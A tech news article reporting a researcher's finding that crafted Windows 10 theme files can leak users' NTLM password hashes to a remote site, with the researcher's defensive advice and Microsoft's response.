Windows 10 Custom Themes Can Now Steal User Credentials

A security researcher recently discovered a vulnerability in custom Windows 10โ€™s themes settings that could allow hackers to steal account information from their victims.

For those unaware, aย Windows themeย is a collection of modifications to the interface which changes the wayย Windowsย looks and feels. Aย themeย may alter the standardย Windowsย icons, mouse cursor, sounds, and desktop background that the operating system will use.

Windows users can share their themes with other users via the Settings UI by right-clicking on the currently active theme under Personalization > Themes and selecting โ€œSave theme for sharingโ€. This will package the theme into a ‘.deskthemepack’ file for sharing via email or as downloads on websites, which can then be downloaded and installed.

Jimmy Bayneย (@bohops) who found the loophole revealed that specially crafted Windows themesย could be used to carry out a โ€˜Pass-the-Hashโ€™ attack. The attacker could create a malicious theme file and redirect it to a page that prompts the user for credentials.

Pass-the-Hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlyingย NTLMย orย LanManย hashย of a user’s password, instead of requiring the associatedย plaintext password as is normally the case. It replaces the need for stealing the plaintext password with merely stealing the hash and using that to authenticate with.

Using this information, an attacker could create a specially crafted โ€œ.theme fileโ€ and change the default desktop wallpaper to a website that requires credentials. When the unsuspecting users use this theme file and enter their credentials, an NTLM hash is sent to the site for authentication. This can be cracked open using special de-hashing tools.

Bayne explained that users should be careful about downloading and installing theme packs that are mainly published on the Web by other users. In order to protect the system from malicious themes, the researcher suggests to block or re-associate the .theme, .themepack, and .desktopthemepackfile extensions to a different program.

Bayne reported these findings to Microsoft’s Security Response Center (MSRC). However, the bug was not fixed because it was a โ€œfeature by designโ€. It is unclear if the company has plans on fixing the issue in the future.

Since most users login into their Microsoft accounts in Windows 10 to access emails, OneDrive, and even Azure data, the theft of the credentials also put these at risk. As a primary measure of account security, it is always better to enable two-factor authentication for your Microsoft accounts to prevent remote access by attackers.

Subscribe to our newsletter

To be updated with all the latest news

Kavita Iyer
Kavita Iyerhttps://www.techworm.net
An individual, optimist, homemaker, foodie, a die hard cricket fan and most importantly one who believes in Being Human!!!

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Subscribe to our newsletter

To be updated with all the latest news

Read More

Suggested Post